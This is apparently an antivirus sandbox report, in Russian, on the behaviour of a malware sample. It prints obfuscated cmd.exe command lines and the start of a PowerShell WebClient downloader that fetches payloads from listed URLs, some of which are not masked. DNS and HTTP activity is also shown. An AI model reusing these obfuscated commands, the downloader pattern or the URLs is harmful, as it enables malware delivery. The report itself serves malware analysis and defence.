Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:O\C"set YWNu=nuzzKDHTpiVltARbUFAIYHcUZTbLJdTZoAATwIRg\mMq,)8vXeWGB0;+Sy\.kN=$}:r(5{Qjfh-@2 asOxE4C'P&&for %h in (63;71;21;43;62;85;11;47;86;85;54;63;7...
Сетевая активность
Подключается к
- 'br#####enturesllc.com':80
- 'gr####lastic.com':80
- 'gh###ash.com':80
- 'ba##ena.com':80
- 'vd##ugt.org':443
TCP
Запросы HTTP GET
- http://br#####enturesllc.com/KQFb4PE
- http://gr####lastic.com/kWXKDqs
- http://www.gr####lastic.com/kWXKDqs
- http://gh###ash.com/H4BeHZlP
- http://ba##ena.com/AAClRLJCGJ
Другие
- 'vd##ugt.org':443
UDP
- DNS ASK br#####enturesllc.com
- DNS ASK gr####lastic.com
- DNS ASK gh###ash.com
- DNS ASK ba##ena.com
- DNS ASK vd##ugt.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:O\C"set YWNu=nuzzKDHTpiVltARbUFAIYHcUZTbLJdTZoAATwIRg\mMq,)8vXeWGB0;+Sy\.kN=$}:r(5{Qjfh-@2 asOxE4C'P&&for %h in (63;71;21;43;62;85;11;47;86;85;54;63;7...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:O/C"set YWNu=nuzzKDHTpiVltARbUFAIYHcUZTbLJdTZoAATwIRg/mMq,)8vXeWGB0;+Sy\.kN=$}:r(5{Qjfh-@2 asOxE4C'P&&for %h in (63;71;21;43;62;85;11;47;86;85;54;63;71;48;1;62;0;49;36;74;32;26;71;49;22;12;7...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo $jHq='lvP';$jXu=new-object Net.WebClient;$hCp='http://br#####enturesllc.com/KQFb4PE@http://greenplastic.com/kWXKDqs@http://ghoulash.com/H4BeHZlP@http://badzena.com/AAClRLJCGJ@htt...
- '<SYSTEM32>\cmd.exe' /S /D /c" FOR /F "delims=.M7GJ6 tokens=2" %P IN ('ftype^|findstr hellM') DO %P -"
- '<SYSTEM32>\cmd.exe' /c ftype|findstr hellM
- '<SYSTEM32>\cmd.exe' /S /D /c" ftype"
- '<SYSTEM32>\findstr.exe' hellM
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
